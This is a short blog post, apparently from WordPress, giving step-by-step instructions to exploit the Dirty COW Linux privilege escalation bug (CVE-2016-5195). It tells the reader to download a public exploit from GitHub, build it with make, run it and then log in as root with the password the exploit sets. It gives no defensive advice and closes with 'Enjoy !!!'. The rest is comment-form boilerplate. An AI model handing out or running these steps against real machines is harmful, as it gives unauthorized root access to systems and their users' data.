How to exploit Dirty Cow Vulnerability?

Dirty Cow” is a Linux local privilege escalation which affects Linux released since 2.6.22 (released in September 2007) up to  October 2016. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism.

To exploit this vulnerability  do the following steps.

  1. Download the zip file from https://github.com/gbonacini/CVE-2016-5195 .
  2. Unzip the zip file.
  3. Open terminal in this directory.
  4. type >> make clean
  5. type >> make
  6. type >> ./dcow
  7. Now your root password is “dirtyCowFun“. To verify type >> su and enter the password “dirtyCowFun“.

Screenshot is given below.dirtycow

Enjoy !!!

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s